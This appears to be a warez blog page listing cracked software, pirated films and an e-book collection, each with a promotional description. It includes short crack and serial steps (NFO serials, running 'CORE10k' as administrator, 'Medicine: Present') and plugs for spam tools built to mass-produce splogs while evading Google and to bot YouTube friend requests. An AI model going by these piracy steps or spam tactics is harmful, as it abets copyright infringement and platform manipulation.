ScriptFTP 3.3

You can use this software when you need automated FTP and secure FTP transfers

ScriptFTP is a FTP/FTPS client created to automate your file transfers.

Add FTP commands to a text file and ScriptFTP will perform them for you automatically. With ScriptFTP you can execute your transfers with just one click on the Run button. You can also schedule the script to run at given times.

Automated FTP and secure FTP transfers.
· Powerful and easy script language. Many examples.
· Upload/Download a set of files or directories.
· Synchronization. Transfer only modified files.
· Script Scheduling. Execute your transfers periodically.
· ZIP file creation for automated backups.
· Report script results via email.
· Batch integration.
· File logging. Log all the transfer details on a text file.
· Error handling. Make your scripts fault tolerant.

· Execute external programs within the script.
· Multiple file renaming.
· Delete remote directory trees.
· Get environment variables within the script.



Read More..

Easy Blogger Creator Pro 3.0

With Easy Blogger Creator Pro, you can rapidly create the kind of blogs that add value. Imagine hundreds of themed, niche blogs that are filled with all sorts of relevant content... like articles, snippets, RSS Feeds and datafeeds. And what if those same blogs had a nice looking header, an autoresponder form to capture e-mails and a variety of contextual advertising and PPA choices? Even audio or video clips... to engage and your visitors?

Learn how you can literally build hundreds of unique, themed Blogger blogs in just a few short minutes... and then put them on auto-pilot! Add images, autoresponders and advertising. Link your blogs together in mini nets. Tag & Ping too.

ImageRapid Blog Creation
* Niche Specific - Don't just throw up blogs. Create multiple blog clusters around a theme or specific niche.
* Create 100's Of Blogger Blogs Quickly - Just load your files, adjust your settings, pick a template and start building.
* Host With Or Locally On Your Domain - Why choose one or the other? Create both!
* Organic Growth Over Time - Stay under Google's radar by growing your blogs slowly and naturally.
* Blog Management - Keeping track of all of your blog information is easy with our Project Summary & Data tables.

ImagePowerful Content Engine
* Automated Scheduled Posts & Comments - Sophisticated scheduler frees you from posting drudgery.
* Mix & Match Content Engine - Add up to four types of content per post - Articles, Snippets, RSS Feeds, Datafeeds.
* Automatic Link Insertion With Keyword Anchor Text - Just load your URL and keyword lists for instant backlinks.
* Duplicate Content Safeguard System - Avoid penalties. Warns when you are about to post the same content again.
* WYSIWYG Post Editor - Just like in Blogger, only better. Easily make hand written posts to one or more of your blogs.

ImageMultiple Template Options
* Randomized Template Selection - Check one box and the program will automatically and randomly choose a template.
* Custom Templates - Want to stand out from the crowd by using your own unique templates? No problem!
* Template Editor - Easily access and modify any template's HTML code by using the built-in template editor.
* Advertising Templates - Why limit yourself to AdSense? Use Chitika, eBay, Amazon, ModernClick & Yahoo too.

ImageAdvanced Settings
* Use A Proxy Server - Protects your IP from being "banned".
* Removes Blogger Bar & "No Follow" Tags - Removes that ugly bar and allows search engines to follow your links.
* Random Character String Generator - No need to create unique usernames, passwords or URLs. System generated.
* Advertising & FTP Profiles - Saves time from having to re-enter FTP information and Ad IDs for different projects.
* Tag & Ping - Easily Add Technorati and IceRocket tags into your blogs. Ping them too.

ImageUnlock CAPTCHA'd Blogs
* Automatically Tracks CAPTCHA'd Blogs - You'll never have to guess if your blog has been CAPTCHA'd.
* Release Request Mechanism - Don't just hit the "Delete" key. Petition Google to re-instate your blog!
* Reinstate, Remove Or Delete CAPTCHA'd Blogs - Easily delete CAPTCHA'd blogs from the program and / or Blogger.

ImageMini Nets
* Quick Mini Net Or Custom Mini Net - Create a mini net with full control or let the program do it automatically.
* Insert Keyword Text Links - Why just link your blogs together with URLs, when you can use keyword anchor text?
* Choose Link Direction - Link inward or outward from parent blogs. Optimize for spidering or to gain link popularity.
* Crosslink Mini Nets - Now you can link between projects, for greater indexing and spidering.

ImageWeb 2.0 Interactivity
* Images - Personalize your blog by adding up to nine custom images, including a header and your photo.
* Auto-Responders - Capture those valuable names and e-mails. Use providers like Aweber and GetResponse.
* Code Snippets - Add forms, audio clips or Flash videos to your blogs.
* Blogger Profiles - Let people know who you are... to build interest, rapport and credibility.
* Social Bookmarking - Easily add social bookmarks to your blogs. Pick from more than 25 of the most popular sites.
* Add To XML - Make it convenient for visitors to subscribe to your blog via RSS.


Read More..

Cool Music Record Edit Station

Create music where, when, and how you want it with unbeatable audio quality.

Cool Music Record/Edit Station is a professional digital audio editor; it allows you to perform various operations with audio file: cut, copy, and paste features (with unlimited undo functionality), mix tracks, or apply effects to recordings.

This program can not only record and play sounds but also import and export a wide range of supported audio files (WAV, AIFF, MP3, and OGG, etc.). In addition, the software offers customizable spectrogram mode and a frequency-analysis window for the other audio-analysis applications.

Create music where, when, and how you want it with unbeatable audio quality. Expand your digital horizons with the software! The possibilities of Cool Music Record/Edit Station are endless.

· Digitize a sound recording and save it as supported formats
· Real-time visuals: bar, waveform, spectrogram, spectrum, level meter, etc
· Record audio data from a microphone or any other available input device
· Display a waveform window of an audio file and apply zooming
· Edit audio files visually (Cut, Copy, Delete Selection, Delete Silence, Paste, Mix Paste, Mix From File, Edit Channel)
· Apply various effects (Amplify, Compressor, Delay, Fade In and Fade Out, Flanger, Invert, Normalize, Phaser, Reverb, Reverse, Silence, Stretch, Vibrato, etc.)
· Apply different filters to any selected portion of audio files (BandPass Filter, HighPass Filter, HighShelf Filter, LowPass Filter, LowShelf Filter, Notch Filter, Peak EQ Filter)
· Insert noise or silence
· Save an audio file as the other format
· Use markers to locate the selected part or special part of the audio data
· Add and edit extra information to your audio files (Album, Artist, Comments, Copyright, Genre, Title, Year)

· Minimum:
· Intel Pentium class 400 MHz processor or better
· 128 MB RAM
· 30 MB Hard Drive space
· 12x CD-ROM drive or better (optional)
· Sound Blaster-compatible sound card and speakers/headphones
· SVGA or higher color video display card (minimum resolution 800x600)
· Internet connection for ordering, and support.
· Recommended:
· Intel Pentium III class 800 MHz MMX or better
· 256 MB RAM or more
· 50 MB Hard Drive space
· 48x CD-ROM drive
· Sound Blaster-compatible sound card and speakers/headphones
· 16-bit color video card
· Internet connection for ordering, and support.


Password if needed
Read More..

Spyware Cease 6.1.0


Spyware Cease effectively scans, removes and blocks spyware, trojans, keyloggers, adware, malicious tracking cookies, browser hijackers, worms, phishing attacks, rootkits, bots, malicious BHOs, dialers and many more spyware threats. Spyware Cease is a powerful spyware and malware remover but consumes minimal computer resources. With Spyware Cease, you can safeguard PC security and enhance PC performance with ease.

Read More..

Camtasia Studio 6.0

Camtasia Studio is the complete professional solution for recording, editing and sharing high-quality screen video on the Web, CD-ROM and portable media players, including iPod. With support for a variety of video standards, you can ensure your content delivery now and in the future.

Read More..

Easy Screen Capture

Easy Screen Capture is a full featured screen capture software that can capture any part of screen from your desktop. It can capture scrolling windows and entire web pages.

With this powerful screen capture tool, you can edit captured images and saved to the most popular file types. You can add text annotation, arrows, shapes and other objects to create professional screenshots for inclusion in online tutorials, Word documents, manuals, promotion material, presentations, websites, emails and so on.

Screen Capture Features:
* Capture full screen, active window, active window without frame.
* Capture windows, buttons, toolbar, controls and other windows objects.

* Capture selected region, three shape supported: rectangle, round and ellipse.
* Capture scrolling windows and entire web pages.
* Can capture some DirectX mode games and movies.
* Include mouse cursor in capture.
* Can pan last region and repeat last capture.

Read More..

Glary Utilities Pro

Glary Utilities Pro offers numerous powerful and easy-to-use system tools and utilities to fix, speed up, maintain and protect your PC. It allows you to clean common system junk files, as well as invalid registry entries and Internet traces. You can manage and delete browser add-ons, analyze disk space usage and find duplicate files. You can also view and manage installed shell extensions, encrypt your files from unauthorized access and use, split large files into smaller manageable files and then rejoin them. Furthermore, Glary Utilities includes the options to optimize memory, find, fix, or remove broken Windows shortcuts, manage the programs that start at Windows startup and uninstall software. Other features include secure file deletion, an Empty Folder finder and more.

* Automatic care in background
* Optimize, clean and boost the speed of your Windows.
* Protect your privacy and security.
* Block spyware, trojans, adware, etc.
* Fix certain application errors.

* Simple, fast and User friendly interface
* Much much more powerful utilities

Home page

Read More..

Magix PC Check and Tuning 2010

MAGIX PC Check & Tuning 2010 checks your computer for weaknesses, locates the causes of system-related problems, corrects errors automatically, and increases your machine?s performance. The integrated system analysis is based on MAGIX? 15 years of experience in technical customer service and has already been implemented on thousands of computers.

* Compatible with Windows 7
* Automatic tuning
* Increase performance
* Improved defragmentation
* Memory tuning
* Internet tuning
* Configure Windows & more?

Unzip to the root of your hdd and install when asked for a serial use the one in the NFO file.

Release: MAGIX.PC.Check.and.Tuning.2010.v5.0.30.804-BLiZZARD
Size: 79 MB


Read More..

R-Studio 5.1 Build 130037 (x86/x64)

R-Studio is a family of powerful and cost-effective undelete and data recovery software. Empowered by the new unique data recovery technologies, it is the most comprehensive data recovery solution for recovery files from FAT12/16/32, NTFS, NTFS5 (created or updated by Windows 2000/XP/2003/Vista), HFS/HFS+ (Macintosh), Little and Big Endian variants of UFS1/UFS2 (FreeBSD/OpenBSD/NetBSD/Solaris) and Ext2FS/Ext3FS (Linux) partitions. It functions on local and network disks, even if such partitions are formatted, damaged or deleted. Flexible parameter settings give you absolute control over data recovery.

R-Studio utilities recover files:
» Deleted without Recycle Bin, or when Recycle Bin has been emptied
» Removed by virus attack or power failure
» After the partition with the files was reformatted, even for different file system
» When the partition structure on a hard disk was changed or damaged
» From hard disk with bad sectors

» Standard "Windows Explorer" - style interface
» Data recovery over the Network

» Supported file systems: FAT12, FAT16, FAT32,NTFS, NTFS5, HFS/HFS+, Little and Big Endian variants of UFS1/UFS2 and Ext2FS/Ext3FS
» Recognition and parsing Dynamic (Windows 2000/XP/2003/Vista), Basic(MBR) and BSD (UNIX) partitions layout schema and Apple partition map
» Damaged RAID recovery
» Creates IMAGE FILES for an entire Hard Disk, Partition or its part
» Data recovery on damaged or deleted partitions, encrypted files (NTFS 5), alternative data streams (NTFS, NTFS 5)
» Recovering data if FDISK or other disk utilities have been run
» Recovering data if VIRUS has invaded; FAT is damaged; MBR is destroyed
» Recognizes localized names
» Recovered files can be saved on any (including network) disks accessible by the host operating system
» File or disk content can be viewed and edited with the advanced hexadecimal editor

New features:
» Support for digital camera raw images
» Versatile data visualisation
» File Sorting
» Expandable Known File Types
» Support for mass file recovery
» Common Find/Mark dialog
» Hex Editor Enhancement
» HFS and HFS+ file systems support
» Apple Computers support
» Big Endian variant of UFS support
» GPT partition layout schema support
» APM support
» Support for various unusual RAID configurations
» R-Studio Technician Portable was added to R-Studio Technician package
» Compressed image format support

Read More..

Corel Ulead VideoStudio Pro x2 v12.0.98.0

VISTA 32 BIT INSTRUCTIONS-After the instalation go to the Folder Key CORE and then click on CR-ULEAD as a ADMINISTRATOR and Unlock it, and then Click on CORE10k as a ADMINISTRATOR..
After that u Do the same thing again but with CORE10K first and then CR-ULEAD... And all done



Read More..

TuneUp Utilities 2010 v9.0.2020.20

TuneUp Utilities gathers pretty much all the maintenance and optimization tools you need into one efficient, easy-to-use application. You couldn't ask for more. TuneUp Utilities makes Windows faster, more secure, and comfortable. If you want to keep your PC running as smoothly as the very first day you switched it on you've got two options: either you download a dozen different system optimization tools or you just use TuneUp Utilities 2010, an excellent tool-kit for your PC. ”

10 fundamental reasons for using TuneUp Utilities 2010

* Powerful hard drive defragmentation
* Optimum start-up, Internet, and Windows acceleration
* Quick and extensive clean-up for hard drives

* Effective elimination of junk data
* Fully-automatic clean-up and improvement of your PC
* Extensive clean-up of the registry
* Effective help in solving standard Windows problems
* Secure data recovery and data elimination
* Simple custom Windows configuration
* Individual Windows styling

Fast, Effective Windows Optimization

* One-click overview of your PC performance
* Quick analysis of your PC’s hardware, operating system, and programs
* Real performance increases, real fast
* Easy-to-understand help functions

Safe Windows Optimization

* Provides you with safe and effective optimization results
* Corrects all mistakes created from previous tuning attempts
* Comprehensive and easy rollback ability for any changes made to your PC

Intelligent Windows Optimization Built in for Every PC

* Intelligent recommendations for your unique PC optimization
* Identifies your personal settings and protects them
* Highlights your PC’s optimization potential, including unused programs and resource-draining settings
* Recommends options and explains performance results before taking any action

Perfectly Designed for Your Windows Operating System

* Automatically detects and configures for your operating system
* Ideal for XP, Vista nad Win7 (32/64 bit) users
* Designed to leverage the unique features within each operating system

Compatible with: Windows XP, Vista and Windows 7 ( 32 and 64 bits )


Read More..

Critical Thinking Skills

Paperback: 264 pages
Publisher: Palgrave Macmillan (September 29, 2005)
Language: English
ISBN-10: 1403996857
ISBN-13: 978-1403996855

Critical Thinking Skills has taken the seemingly baffling art of analysis and broken it down into easy to understand blocks, with clear explanations, good examples, and plenty of activities to develop understanding at each stage. This easy to follow, step-by step guide to developing reasoning skills even applies the techniques to tasks such as reading, note-taking, and writing.

Read More..

YouTube Friend Bomber 4.0.3

YouTube Friend Bomber is the internets #1 YouTube Friend Adder Bot. YouTube Friend Bomber is social network marketing software. Promote your business or yourself with "automation". Wait! YouTube Friend Bomber uses a highly advanced technology called .NET. If your program does not open properly, you will need the Microsoft .NET 2.0 Runtime. (It's Free)

Download Read More..

Total 3D Home Design Deluxe 8.0

Total 3D Home? separates itself from other products in its class since it is designed for you, rather than an architect. Previous design skills are not needed. Whether you are remodeling your house, decorating a room, or designing your dream home, the tools and inspiration you need are included. You'll have access to all the features you need without paying for features you don't want.

Easy-to-Use Professional-Quality Features
1,000 Sample Home Plans -- Save time and money using a ready-to-build home plan.

Quick FloorPlan Designer -- Simply drag and drop SmartRoom? Blocks to create complete rooms automatically.

Scan & Trace Blueprints -- Perfect for remodeling projects as you can add, delete, or move walls.

Color-Coded Floor Plan -- Easily identify furniture, appliances, windows, doors, and more in your design.

Video Tutorial -- Loaded with helpful tips, the comprehensive Video Tutorial walks you through starting, building, and viewing your plan.

Powerful Custom 3D Design Tools
Import Digital Photos -- Further customize your design by importing pictures into your design. Want to see how your favorite chair will look in your new living room? Just import a picture of it.

Custom Doors & Windows -- Choose from over 40 window and door designs. Then modify them to fit your design.

Easily Estimate Costs & Track Your Budget -- Create designs that fulfill your dreams and fit your budget. Automatically track estimated and actual costs for materials and labor.

Exclusive! Window Treatment Design Tool -- Wake up your windows! Try new ideas for shades, valances, panels, and more.

Millions of Design Combinations -- Choose from unlimited combinations of tiles, flooring, paint, wallpaper, bricks, and more.

High Quality 3D Imaging
Real-Photo? Dynamic Imaging -- Total 3D Home's advanced photo-rendering transforms the look of a room using real photography.

Drag & Drop 3D Furniture & Objects -- Quickly decorate and furnish your home with life-like 3D objects.

20,000 Brand-Name Products -- No other software provides you with as many brand-name products as Total 3D Home. Visualize furniture, appliances, and other items in your plan before you buy them.

3D Kitchen & Bath Remodeling -- Designing the perfect kitchen or bathroom has never been easier. Try new fixtures, appliances, and cabinets in seconds. Then view it in 3D!

3D Bedroom & Living Room Makeovers -- Find a new style or look by quickly applying new colors, textures, and fabrics to furniture and floors.

Automatic Customizable Roofs -- Choose from Hip, Gable, Gambrel, Flat, Shed, or Mansard. Then adjust the angle and pitch for a custom design.

System Requirements
? Pentium? III or faster ? Microsoft? Windows? 7, Vista, XP, Me, 2000 & 98SE ? 128MB RAM; 256MB Recommended ? 1.8 GB free hard-disk space (Min. Install) ? 4X CD-ROM drive or faster (DVD-ROM if installing from a DVD) ? SVGA 800x600 and higher display, High Color (16-bit) required; True Color (24 or 32-bit) supported ? DirectX8? compatible video and sound cards
Printer support - Works with most black and white and color printers supported by Windows?
Optional - Modem and Internet Service Provider for product downloads ? Scanner or digital camera needed to import photos into the product

Format: ISO image DVD disc
Interface: English Softonic
Activation: Not required
Size :1.15GB


Read More..

JetAudio 7.5.5

JetAudio plays various music and video files. Features included are: CD Burning, Recording, and File Conversion. You can create Internet Broadcasts with JetCast. JetAudio plays most major file formats and various video or audio tracks. You can even convert audio files to various formats. A special feature is Video
conversion which can make video files compatible for your portable devices such as iPOD or PSP. Other features include: sound effects (Wide, Reverb, and X-Bass), multichannel sound output, speed control for audio playback, cross-fading, skin changes, and synchronized lyric display for MIDI and MP3s.

JetAudio v7.5.5 Plus VX | 24.54 Mb
Read More..

BitDefender All Products 2010 13.0

Building products BitDefender: BitDefender AntiVirus 2010, BitDefender Internet Security 2010, BitDefender Total Security 2010. BitDefender offers the most advanced technology to protect your PC from viruses, spyware, hackers, etc.

BitDefender Antivirus provides advanced protection against viruses, spyware, hacker attacks and data theft, without slowing down your computer.

- Even more protection!
Many modern viruses to penetrate your computer and avoid detection by security systems because they did not immediately attack the computer. These viruses are a time to "sleep" state and begin to act only when your computer is most vulnerable. BitDefender 2010 includes a feature Active Virus Control, which provides continuous monitoring of all processes that occur on your computer and detect the slightest suspicious actions, before they can cause any harm.

BitDefender All Products 2010 13.0
- Even easier to work with the program!
BitDefender Antivirus 2010 interface became more convenient and comprehensible, you can configure for the appropriate profile for quick access to all necessary functions (for example, profiles "Parental Control" or "Game mode"). In BitDefender Antivirus 2010 you can customize the toolbar to suit your level of computer knowledge: "for Beginners", "Medium" and "expert".

- With BitDefender Antivirus 2010 you can safely download and transmit information without fear of open files from friends, relatives, employees and even - unknown recipients!

BitDefender Total Security provides comprehensive protection for your PC, combining a means to combat malicious code, spyware, spammers, hackers, with additional features full control of the Internet and the advanced capabilities of data backup. BitDefender ensures reliable protection of your computer without slowing down his work.

BitDefender Total Security 2010 is different from the previous version even greater productivity, improved intrusion detection and parental controls, as well as many other new features.

- Even more protection!
Many modern viruses to penetrate your computer and avoid detection by security systems because they did not immediately attack the computer. These viruses are a time to "sleep" state and begin to act only when your computer is most vulnerable. BitDefender 2010 includes a feature Active Virus Control, which provides continuous monitoring of all processes that occur on your computer and detect the slightest suspicious actions, before they can cause any harm.

BitDefender Internet Security provides protection against viruses, spyware, spam, phishing attempts, intruders and malicious Web content.
- Anti
The module Anti - to ensure detection and removal of all viruses in circulation. BitDefender Internet Security uses robust scan engines, certified laboratory ICSA, Virus Bulletin, Checkmark, CheckVir and TUV.

- Firewall
The firewall module filters network traffic and controls when the user access to the Internet and permission to run applications. Stealth mode allows you to "hide" your computer from malicious software and hackers.

- Spam
BitDefender Internet Security will solve the problem of spam, and you will not worry about it.

- Anti-Spyware
BitDefender Internet Security monitors and prevents potential spyware infiltration of objects in real time, before they harm your system. Using an extensive database of known spyware signatures of objects, your computer is protected from spyware.

Operating system: Windows ® XP/Vista/7
Language: English
Medicine: Present


Read More..

Spyware Doctor With Antivirus 2010

Spyware Doctor with Antivirus 2010 v7.0.0.514 Full
Spyware Protection | 35 MB | Multilanguage

Spyware Doctor provides three-way spyware protection for your PC through real-time threat blocking, advanced system scanning and immunization against known browser infections. Spyware Doctor is a multi-award winning spyware removal utility that detects, removes and protects your PC from thousands of potential spyware, adware, Trojans, keyloggers, spybots and tracking thrats. Protect your privacy and computing habits from prying eyes and virtual trespassers with the help of Spyware Doctor.

Anti-virus software and firewalls do not fully protect your system against the majority of spyware and privacy threats. Because spyware is commonly bundled with software downloads, attached to e-mails, or transmitted through networks it can appear to be legitimate software, but once installed it can be
nearly impossible to detect and remove without the help of a dedicated spyware removal tool like Spyware Doctor. Spyware Doctor has consistently been awarded Editors' Choice, by leading PC magazines and testing laboratories around the world, including United States, United Kingdom
, Sweden, Germany and Australia. All current versions of Spyware Doctor have won Editors' Choice awards from PC Magazine in United States. In addition, after leading the market in 2005, Spyware Doctor was awarded the prestigious Best of the Year at the end of 2005.

Spyware Doctor Tools:
- Spyware & Adware Scanner Keylogger
- Guard Popup
- Blocker Phishing
- Protector Real Time
- Protection Browser
- Guard Spyware Cookie
- Guard Malware
- Immunizer

What's New in Spyware Doctor 7.0 :
? NEW! ThreatFire? Behavioral Intelligence features next-generation technology to block new threats faster than traditional signature methods.
? NEW! Multi-layered browsing protection against web-based attacks, including phishing attempts, rogueware scare tactics and silent drive-by downloads, using a combination of reactive blacklists and proactive dynamic content analysis technologies.
? NEW! State Awareness Modes intuitively detect how you are using your PC and adjust to minimize performance impact and reduce interruptions.
? NEW! Browser Guard stops 'drive-by' downloads of fake AV or malicious files from compromised or exploit websites.
? NEW! Protection Statistics Report informs you of how PC Tools has protected your PC over the last 30 days.
? IMPROVED! Advanced rootkit detection technology identifies and removes hidden threats from your PC.
? IMPROVED! Built on a modular architecture which utilizes a diverse range of technologies that detect, block and remove threats attempting to compromise your PC.
? IMPROVED! Site Guard blocks you from visiting potentially unsafe or phishing websites and from downloading threats through your browser, IM or email.
* Cookie Guard automatically removes potentially malicious tracking and advertising cookies.

Constant real-time IntelliGuard protection prevents known and new malware threats before they can install and cause any harm to your PC. IntelliGuard monitors for malicious activity involving spyware processes, viral activity, tracking cookies, suspicious ActiveX objects, browser hijackers, keyloggers, trojans and more.
Intelli-Scan swiftly hunts and kills active spyware threats - utilizes patent-pending spider scanning technology to quickly identify and remove threats.
Behavior Guard, built on ThreatFire's patent-pending ActiveDefense technology intelligently scans and analyzes computer processes to accurately detect and block any malicious activity.

Smart Updates silently and automatically install protection updates and product upgrades to ensure powerful protection against the latest threat outbreaks.
24/7 Global Malware Research Centre constantly tackles the latest threat types and implements new innovations and technologies to quickly combat cybercrime.

Game Mode automatically detects your PC switching into full-screen mode for games, movies or presentations and ensures an uninterrupted experience.
Idle Mode automatically runs resource intensive tasks when your PC is not in use.
Power Saving Mode postpones power-intensive tasks until your laptop is plugged in, extending battery life.

Compatible with: Windows 2000, XP, Vista ( 32/64-bits ), Win7 ( 32/64-bits )
Multilingual: English, Spanish, French, Italian, German, Portugu?s, etc

Read More..

Visual Business Cards 4.17 (Portable)

Visual Business Cards is a tool that designs and prints business cards. Design and Print your own professional looking business cards using a simple but powerful design screen. The New Card Wizard steps you easily through the process. Tons of custom artwork and backgrounds included. Now with more templates and improved graphic handling. Insert clip art and pictures, use the drawing tools for unique text and graphical effects. Use rectangles, ovals, rounded rectangles, diamonds, triangles and stars with special effects properties including shadows, brushed surfaces, and gradient filled surfaces. Use any font, any color, and rotate text to any angle. Visual Business Cards is a tool that designs and prints business cards. Works with all standard business card stock from Avery and other suppliers. Use true drag and drop WYSIWYG design. Create text in circles or partial circles. Flip and reverse clip art.

The portable app does not require installation. Make as many copies as you need. Carry it in a flash drive and use on any computer, even without administrator access. No change of any setting on the host computer. No more conflicts with other applications. No more 'hijacking' of file types.


Read More..

Harry Potter and the Half Blood Prince (2009) DVDRip

As Harry Potter begins his 6th year at Hogwarts School of Witchcraft and Wizardry, he discovers an old book marked mysteriously "This book is the property of the Half-Blood Prince" and begins to learn more about Lord Voldemort's dark past.



RapidShare :

MegaUpload: Read More..

USB Disk Security

USB Disk Security provides 100% protection against any threats via USB drive, however, the majority of other products are unable even to guarantee 90% protection.USB Disk Security is the best antivirus software to permanently protect offline computer without the need for signature updates, but other antivirus software should update signature database regularly, and they cannot effectively protect offline computer. This light and easy to use solution is 100% compatible with all software and doesn't slow down your computer at all. You payUSB Disk Security once and get it all, however, other antivirus products should be paid for updates every year.

Product Highlights:

* 100% protection against any malicious programs via USB storage

USB Disk Security uses innovative proactive technology to block any threats via USB drive. There are relatively few products available in shops or on the Internet which offer even close to 100% protection against any malicious programs via USB drive. The majority of products are unable even to guarantee 90% protection.USB Disk Security is the world's best software to block threats via USB drive.

* The best solution to protect offline computer

Other antivirus software should update signature database regularly, and they cannot effectively protect offline computer that is not connected to the Internet. When new viruses, worms and other malicious attacks strike, traditional signatures are insufficient. Every minute one waits for a virus signature update creates a window of vulnerability that could have devastating consequences.USB Disk Security uses advanced proactive detection techniques, requires no signature updates, and closes the window of vulnerability left open by other reactive, signature-based responses.

* The world's fastest and smallest antivirus software

With USB Disk Security, it’s not necessary to sacrifice speed for detection and scanning. Compare antivirus software and you'll discover that USB Disk Security is by far one of the smallest applications in the industry. For example, the v5.0 of USB Disk Security installer is just 1 MB. The program utilizes approximately 1 to 7 MB of RAM.

* 100% compatible with all software
Incompatibility between antivirus programs is an issue. In the vast majority of cases, installing two antivirus programs from different vendors on one machine (for increased protection) is technically impossible, as the two programs will disrupt each other's functioning. However,USB Disk Security is 100% compatible with all software, including Windows Vista.

* Simple to use

USB Disk Security has been specifically designed to perform effectively regardless of the user’s level of computer expertise. Just install and forget it.

Read More..

Mutants (2009)DVDrip

Title: Mutants
Original title: Mutants
Year: 2009
Genre: Horror, science fiction, drama
Director: David Morley / David Morlet
Cast: Ellen de Fuzhrol, Francis Renaud, Dida Diafat, Nicolas Briançon, Luz Mendon, Justin Bruneo De La Salle

In a world devastated pandemic virus that turned people into primitive and bloodthirsty creatures, Mark and Sonja must find a secret base in order to avoid a meeting with "mutants". When the last attack them, Marco is infected. Gradually, his body starting to happen, irreversible changes. Sonya, expecting a child, forced to fight its worst enemy - a man whom she loves more than anything else.

Read More..

Wing FTP Server 3.2.0 Corporate Edition

Wing FTP Server is a professional cross-platform FTP Server featuring speed, reliability, user-friendly and customization. The server has Real-Time Information function, letting you monitor your FTP server in real time, keeping an eye on each user connected to the server and collecting detailed information about them.

It includes a new set of advanced tools (Administrator Console, Task Scheduler, Web based Remote Control), scripts support let users extend the Server by Lua language, Virtual Directories for easy sharing files and directories, and ratio, disk quota system for controlling how much an user or a group uploads and downloads.

Major Features:

* Cross Platform
You can run the server on Windows,Linux,Mac,freeBSD and Solaris.
* Multi-Protocols
Support FTP, FTPS, HTTP, HTTPS, and SSH.
* Web-based Administration
Administrate your server from anytime and anywhere.
* Web-based Client

Access your files from anytime and anywhere.
* Administrator Console
A powerful tool for administrator like Unix Shell.
* Task Scheduler
Manage your Lua Scripts task to take an action at a specified time.
* Programmable Event Manager
Run your Lua Scripts,send email, or execute third party software.
* Database Storage
Database storage of accounts information via ODBC or MySQL directly.
* Application Programming Interface
Provide a lot of API that can be called in Lua Scripts.
* Virtual Directories
Share files and directories easy.
* Real-Time Information
Give you the ability to monitor your FTP server in real-time. you can monitor each user connected to your server and gather detailed information about them (download speed, last command, idle time).
* Ratio, disk quota system
Give when someone gives you.
* Custom Logo
You can use a custom logo for login window.
* Multi-Language
Now support English, Japanese, Simplified Chinese, Traditional Chinese

Size : 11 MB

Read More..

Stephen King - 100 Books Collection

Books Included:

01- An Evening At Gods
02- Autopsy Room Four
03- Bachman Books - THE LONG WALK
04- Bachman Books - Running Man
05- Beachworld
06- Before The Play
07- Big Wheels A Tale of The Laundry Game
08- Carrie
09- Chattery Teeth
10- Crouch End
11- Cujo
12- Cycle of the Werewolf
13- Dolores Clairborne
14- Dreamcatcher
15- Four Past Midnight - 1 - Introduction
16- Four Past Midnight - 2 - The Langoliers
17- Four Past Midnight - 3 - Secret Window, Secret Garden
18- Four Past Midnight - 4 - The Sun Dog
19- Four Past Midnight - 5 - The Library Policeman
20- Gramma
21- Head Down
22- Home Delivery
23- Hotel at The end of The Road
24- In the Key-Chords of Dawn
25- It Grows on You
26- It
27- I've Got To Get Away

28- Johnathan and the Witches
29- L.T.'s Theory Of Pets
30- Lunch at the Gotham Cafe
31- Needful Things
32- Never Look Behind You
33- Night Shift - Battleground
34- Night Shift - Children of the Corn
35- Night Shift - Foreward
36- Night Shift - Graveyard Shift
37- Night Shift - Grey Matter
38- Night Shift - I Am The Doorway
39- Night Shift - I Know What You Need
40- Night Shift - Jerusalems Lot
41- Night Shift - Night Surf
42- Night Shift - One For The Road
43- Night Shift - Quitters
44- Night Shift - Sometimes They Come Back
45- Night Shift - Strawberry Spring
46- Night Shift - The Boogeyman
47- Night Shift - The Last Rung On The Ladder
48- Night Shift - The Lawnmower Man
49- Night Shift - The Ledge
50- Night Shift - The Man Who Loved Flowers
51- Night Shift - The Mangler
52- Night Shift - The Woman In The Room
53- Night Shift - Trucks
54- Nona
55- Pet Sematary
56- Popsy
57- Rainy Season
58- Rare - The Road Virus Heads North
59- Riding the Bullet
60- Skeleton Crew
61- Skybar
62- Sneakers
63- Squad D
64- Survivor Type
65- The Ballad of the Flexible Bullet
66- The Blue Air Compressor
67- The Cat from Hell
68- The Crate
69- The Cursed Expedition
70- The Dark Man
71- The Darktower 1 - The Gunslinger
72- The Dead Zone
73- The Doctor's Case
74- The End of the Whole Mess
75- The Fifth Quarter
76- The Girl Who Loved Tom Gordon
77- The Green Mile
78- The Hardcase Speaks
79- The House on Maple Street
80- The Jaunt
81- The Leprechaun
82- The Man In The Black Suit
83- The Man Who Would Not Shake Hands
84- The Mist
85- The Monkey
86- The Moving Finger
87- The Other Side Of The Fog
88- The Plant (Part 1-5)
89- The Reach
90- The Reaper's Image
91- The Regulators
92- The Shining
93- The Stranger
94- The Ten O 'Clock People
95- The Thing at the Bottom of the Well
96- The TommyKnockers
97- Thinner
98- Uncle Otto's Truck
99- Word Processor of the Gods
100- You Know They Got a Hell of a Band

Read More..

Hitman Pro 3.5

Hitman Pro 3 - the all-in-one tool against malicious software
Hitman Pro 3 is a fast all-in-one tool to locate, identify and remove viruses, spyware, trojans, rootkits and other malware. Hitman Pro 3 will quickly show if your PC is infected with malicious software.
Research shows that many computers are infected, even if they have an up-to-date security suite installed, and that a combination of different anti malware programs would be required to prevent infection.
Hitman Pro 3 uses innovative cloud computing techniques to detect and remove potential malware threats with minimal impact on system performance.

Advantages of Hitman Pro 3
* Recognizes and removes viruses, trojans, rootkits, spyware and other malware.
* Revolutionary innovation in scanning technique to distinguish between malicious and safe software without signatures.
* Short scan time - searches the system within a few minutes.
* No extra system load.
* Impossible to make false positives on important systems files thanks to "profiling" and whitelisting.

* Multi-vendor identification of malware in our real-time "Scan Cloud".
* Automatically restores common system alterations made by malicious software.
* Creates a check point in System Restore before removing malicious software.
* Removes resistant threats using native NT boot-time deleter.
* Removes references to malicious software (like shortcuts and registry entries).
* Free malware scan.

Read More..

IDM UltraEdit

IDM UltraEdit is used across a diverse range of industries, from professional writers, researchers and journalists to advanced programmers, database managers and web developers. Scores of individuals use UltraEdit as a powerful replacement for windows notepad and even more use it as a text editor because of its ability to handle multiple documents at once, large file handling, powerful search/find/replace functionality, spell checking versatility and much more. Replacing Notepad or looking for a powerful text editor? UltraEdit is what you're looking for. UltraEdit is the ideal text, HEX, HTML, PHP, Java, javascript, Perl, and Programmer's editor. It's versatile and easy to use. UltraEdit is specially designed for inputting and editing text and code, UltraEdit supports configurable syntax highlighting and code structuring for most any programming languages.

Key features
• Code Folding
• Supports 64-bit file handling (standard) on 32-bit Windows platforms (Windows 2000 and later)
• Unicode support
